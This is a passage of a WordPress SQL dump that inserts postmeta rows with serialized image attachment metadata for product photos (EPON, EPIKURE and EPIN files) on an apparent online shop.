INSERT INTO `wp_postmeta` VALUES (18212, 1886, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:22:"2016/08/EPIN-58034.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"EPIN-58034-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"EPIN-58034-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"EPIN-58034-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"EPIN-58034-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"EPIN-58034-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"EPIN-58034-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"EPIN-58034-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"EPIN-58034-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18213, 994, '_thumbnail_id', '1886'); 
INSERT INTO `wp_postmeta` VALUES (18214, 994, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18215, 1887, '_wp_attached_file', '2016/08/EPIKURE-W-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18216, 1887, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/08/EPIKURE-W-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"EPIKURE-W-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"EPIKURE-W-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"EPIKURE-W-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"EPIKURE-W-1-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"EPIKURE-W-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"EPIKURE-W-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"EPIKURE-W-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"EPIKURE-W-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18217, 1059, '_thumbnail_id', '1887'); 
INSERT INTO `wp_postmeta` VALUES (18218, 1059, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18219, 1888, '_wp_attached_file', '2016/08/EPON-813.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18220, 1888, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-813.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-813-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-813-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-813-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-813-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-813-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-813-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-813-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-813-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18221, 903, '_thumbnail_id', '1888'); 
INSERT INTO `wp_postmeta` VALUES (18222, 1889, '_wp_attached_file', '2016/08/EPON-815C.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18223, 1889, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-815C.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-815C-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-815C-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-815C-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-815C-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-815C-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-815C-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-815C-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-815C-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18224, 910, '_thumbnail_id', '1889'); 
INSERT INTO `wp_postmeta` VALUES (18225, 910, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18226, 1890, '_wp_attached_file', '2016/08/EPON-825.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18227, 1890, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-825.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-825-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-825-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-825-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-825-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-825-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-825-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-825-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-825-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18228, 1891, '_wp_attached_file', '2016/09/Specialty-Products-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18229, 1891, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3973;s:6:"height";i:2237;s:4:"file";s:32:"2016/09/Specialty-Products-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"Specialty-Products-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"Specialty-Products-2-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"Specialty-Products-2-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"Specialty-Products-2-1600x901.jpg";s:5:"width";i:1600;s:6:"height";i:901;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"Specialty-Products-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"Specialty-Products-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"Specialty-Products-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"Specialty-Products-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18230, 842, '_thumbnail_id', '1890'); 
INSERT INTO `wp_postmeta` VALUES (18231, 842, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18232, 1892, '_wp_attached_file', '2016/08/EPIKURE-3223.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18233, 1892, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/08/EPIKURE-3223.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3223-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3223-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3223-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3223-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3223-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3223-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3223-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3223-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18234, 861, '_thumbnail_id', '1924'); 
INSERT INTO `wp_postmeta` VALUES (18235, 861, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18236, 1893, '_wp_attached_file', '2016/08/EPON-828.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18237, 1893, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-828.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-828-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-828-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-828-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-828-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-828-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-828-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-828-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-828-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18238, 877, '_thumbnail_id', '1893'); 
INSERT INTO `wp_postmeta` VALUES (18239, 877, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18240, 1894, '_wp_attached_file', '2016/08/EPON-830.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18241, 1894, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-830.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-830-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-830-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-830-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-830-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-830-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-830-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-830-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-830-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18242, 882, '_thumbnail_id', '1894'); 
INSERT INTO `wp_postmeta` VALUES (18243, 882, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18244, 1895, '_wp_attached_file', '2016/08/EPON-834.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18245, 1895, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-834.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-834-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-834-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-834-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-834-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-834-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-834-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-834-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-834-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18246, 885, '_thumbnail_id', '1895'); 
INSERT INTO `wp_postmeta` VALUES (18247, 885, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18248, 1896, '_wp_attached_file', '2016/08/EPON-862.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18249, 1896, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-862.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-862-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-862-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-862-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-862-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-862-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-862-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-862-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-862-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18250, 887, '_thumbnail_id', '1896'); 
INSERT INTO `wp_postmeta` VALUES (18251, 887, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18252, 1897, '_wp_attached_file', '2016/08/EPON-872.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18253, 1897, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:20:"2016/08/EPON-872.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"EPON-872-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"EPON-872-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:20:"EPON-872-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"EPON-872-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"EPON-872-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"EPON-872-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"EPON-872-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:20:"EPON-872-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18254, 900, '_thumbnail_id', '1897'); 
INSERT INTO `wp_postmeta` VALUES (18255, 900, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18256, 1898, '_wp_attached_file', '2016/08/EPON-1002F.jpg'); 
